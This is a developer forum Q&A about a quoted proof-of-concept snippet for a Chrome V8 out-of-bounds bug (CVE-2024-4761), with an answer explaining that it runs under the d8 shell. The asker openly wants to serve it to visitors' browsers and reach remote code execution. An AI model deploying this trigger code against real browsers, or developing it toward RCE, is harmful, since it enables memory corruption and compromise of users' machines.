how to build/demonstrate a proof of concept (PoC) of a Out of Bonds (oob) based CVE Google Chrome
I was going through an article on Proof of Concept of a CVE in Google Chrome (OOB issue) which had this code snippet: (https://medium.com/@elniak/cve-2024-4761-exploiting-chromes-javascript-engine-highly-exploited-poc-presented-dcf9cab95c00)
const prefix = "...";
d8.file.execute(`${prefix}/test/mjsunit/wasm/wasm-module-builder.js`);
  let builder = new WasmModuleBuilder();
  let array = builder.addArray(kWasmI32, true);
  builder.addFunction('createArray', makeSig([kWasmI32], [kWasmExternRef]))
    .addBody([
            kExprLocalGet, 0,
            kGCPrefix, kExprArrayNewDefault, array,
            kGCPrefix, kExprExternConvertAny,
          ])
    .exportFunc();
/*
 builder.addFunction('set', makeSig([kWasmExternRef, kWasmI32, kWasmI32], []))
    .addBody([
            kExprLocalGet, 0,
            kGCPrefix, kExprAnyConvertExtern,
            kGCPrefix, kExprRefCastNull, array,
            kExprLocalGet, 1,
            kExprLocalGet, 2,
            kGCPrefix, kExprArraySet, array,
          ])
    .exportFunc();

*/
let instance = builder.instantiate({});
let wasm = instance.exports;
let array42 = wasm.createArray(42);
// %DebugPrint(array42);
let src = {};
src.a = 1;
delete src.a;
for (let i = 0; i < 1024; i++) {
  src[`p${i}`] = 1;
}

// %DebugPrint(src);
// %SetDataProperties(array42, src);
Object.assign(array42, src);

so, it appears to be in JS.
how to demonstrate the working of this code snippet?
I tried to save it as .js file and opening it in my Chrome browser (App version 110.80)
Nothing worked. I have no clue how it is harmful or possibly allow RCE. Need some information on potential utilization of the code snippet.
this is for educational purpose

What version of Chrome are you running? Are you sure it’s a version vulnerable to this flaw?

Further, if you don’t understand what a piece of code does, it’s not clear to me why you’d run it in the first place.

@esqew Chrome 110.0.

@esqew because I had thought it will output something

@esqew will please consider doing a disscuss in a chat

Please clarify your specific problem or provide additional details to highlight exactly what you need. As it's currently written, it's hard to tell exactly what you're asking.

@esqew please explain

Firstly, a warning
If you aren't familiar with what a piece of code from an untrusted source does by reading/investigating it, it is a very, very bad idea for you to run it at all.
This is especially true for snippets provided in relation to security vulnerabilities, where the probability is higher of something going terribly wrong, either inadvertently or otherwise.
For this PoC in particular, you should expect it to potentially cause substantial instability in your system because of its ability to write to arbitrary memory locations.


how to demonstrate the working of this code snippet?

The proof-of-concept code you're interested refers to a global d8 variable, which indicates very strongly this is code intended to be used with the d8 command-line developer tool for the V8 engine.
Once you have d8 installed on your local machine (along with a version of the V8 engine that is vulnerable to the CVE in question), you could save this snippet to a file and invoke it using d8 as you would most any other command line program, i.e. d8 script.js.

got the answer to first part, however, how is it possible to (1) execute it on client web browser (when I upload this to my web server) and, (2) do Remote Code execution with this, as you said it makes some memory instabilities, but i am not interested in the mem instability part of it.

This code is not possible to run on a client web browser given its dependency on d8. I am not personally familiar with how you could abuse this for RCE, as my understanding of the bug (and V8 more holistically) is very limited. (In the future, please try not to pester contributors like myself using comments that themselves don't add anything to the conversation and only serve to ping users, it's particularly rude.)

Sir, "personally familiar with how you could abuse this for RCE" is not making any sense, as this question is meant to safeguard; that means it is for making us aware of this thing, how you assumed otherwise

Include this file to your code: https://github.com/v8/v8/blob/main/test/mjsunit/wasm/wasm-module-builder.js
